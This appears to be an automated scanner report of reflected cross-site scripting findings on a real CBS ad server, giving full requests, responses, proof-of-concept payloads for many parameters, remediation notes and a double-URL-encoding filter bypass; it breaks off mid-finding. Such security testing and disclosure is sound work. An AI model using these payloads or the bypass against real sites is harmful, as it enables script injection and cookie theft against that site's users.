GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy6377c<a>3fffe363d11&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy6377c<a>3fffe363d11&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' ...[SNIP]...
The value of the DVAR_INSTLANG request parameter is copied into a JavaScript inline comment. The payload 95bb9*/alert(1)//5a7288748bb was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US95bb9*/alert(1)//5a7288748bb&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:36:05 GMT Server: Apache/2.2 Content-Length: 1189 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 06 Feb 2011 20:36:05 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US95bb9*/alert(1)//5a7288748bb&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the DVAR_INSTLANG request parameter is copied into the HTML document as plain text between tags. The payload 45b84<a>3f59d2a0e54 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US45b84<a>3f59d2a0e54&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US45b84<a>3f59d2a0e54&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='100' NCAT='19650:19806:' CNET-PA ...[SNIP]...
The value of the DVAR_SESSION request parameter is copied into a JavaScript inline comment. The payload 60d21*/alert(1)//3098f5412a was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b60d21*/alert(1)//3098f5412a&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:35:05 GMT Server: Apache/2.2 Content-Length: 1187 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 06 Feb 2011 20:35:05 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b60d21*/alert(1)//3098f5412a&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the DVAR_SESSION request parameter is copied into the HTML document as plain text between tags. The payload 1aacb<a>a9e8aafda38 was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b1aacb<a>a9e8aafda38&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b1aacb<a>a9e8aafda38&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRA ...[SNIP]...
The value of the GLOBAL&CLIENT:ID request parameter is copied into a JavaScript inline comment. The payload 963a9*/alert(1)//e7e2702a46 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS963a9*/alert(1)//e7e2702a46&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:33:33 GMT Server: Apache/2.2 Content-Length: 1145 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 06 Feb 2011 20:33:33 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS963a9*/alert(1)//e7e2702a46&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NU ...[SNIP]...
The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload 8321f<a>c1fffffa83 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS8321f<a>c1fffffa83&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS8321f<a>c1fffffa83&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_N ...[SNIP]...
The value of the NCAT request parameter is copied into the HTML document as plain text between tags. The payload 2dc21<a>6048630f020 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A2dc21<a>6048630f020&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A2dc21<a>6048630f020&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE=' ...[SNIP]...
The value of the NCAT request parameter is copied into a JavaScript inline comment. The payload cce01*/alert(1)//1575e9d6777 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3Acce01*/alert(1)//1575e9d6777&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:35:31 GMT Server: Apache/2.2 Content-Length: 1194 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 06 Feb 2011 20:35:31 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3Acce01*/alert(1)//1575e9d6777&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the NODE request parameter is copied into a JavaScript inline comment. The payload 901dd*/alert(1)//13d918e3a50 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806901dd*/alert(1)//13d918e3a50&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:35:45 GMT Server: Apache/2.2 Content-Length: 1172 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 06 Feb 2011 20:35:45 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806901dd*/alert(1)//13d918e3a50&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the NODE request parameter is copied into the HTML document as plain text between tags. The payload e0b42<a>621aa8019b1 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806e0b42<a>621aa8019b1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806e0b42<a>621aa8019b1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS=' ...[SNIP]...
The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload b9251*/alert(1)//b4f70b6b83f was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=b9251*/alert(1)//b4f70b6b83f&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:34:05 GMT Server: Apache/2.2 Content-Length: 1179 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 06 Feb 2011 20:34:05 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=b9251*/alert(1)//b4f70b6b83f&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.w ...[SNIP]...
The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92086%2527%253balert%25281%2529%252f%252f2cd17c06c35 was submitted in the PAGESTATE parameter. This input was echoed as 92086';alert(1)//2cd17c06c35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the PAGESTATE request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=92086%2527%253balert%25281%2529%252f%252f2cd17c06c35&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:34:03 GMT Server: Apache/2.2 Content-Length: 1225 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 06 Feb 2011 20:34:03 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=92086%2527%253balert%25281%2529%252f%252f2cd17c06c35&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT ...[SNIP]... sion%253db&ucat_rsi=%2526&pg=&t=2011.02.06.20.34.03/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" style="position:absolute; top:0px; left:0px" width="0" />'); ;window.CBSI_PAGESTATE='92086';alert(1)//2cd17c06c35';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c17-ad-xw1.cnet.com::2603727760 2011.02.06.20.34.03 *//* MAC T 0.0.3.3 */
The value of the POS request parameter is copied into the HTML document as plain text between tags. The payload da453<a>3c66de957c3 was submitted in the POS parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100da453<a>3c66de957c3&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100da453<a>3c66de957c3&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='80' CNET-PTYPE='6711' POS='100da453a3c66de957c3' NCAT='19650:19806:' CNET-PARTNER-ID='1' DVAR_P ...[SNIP]...
The value of the PTYPE request parameter is copied into a JavaScript inline comment. The payload dba23*/alert(1)//ccaf888c20c was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
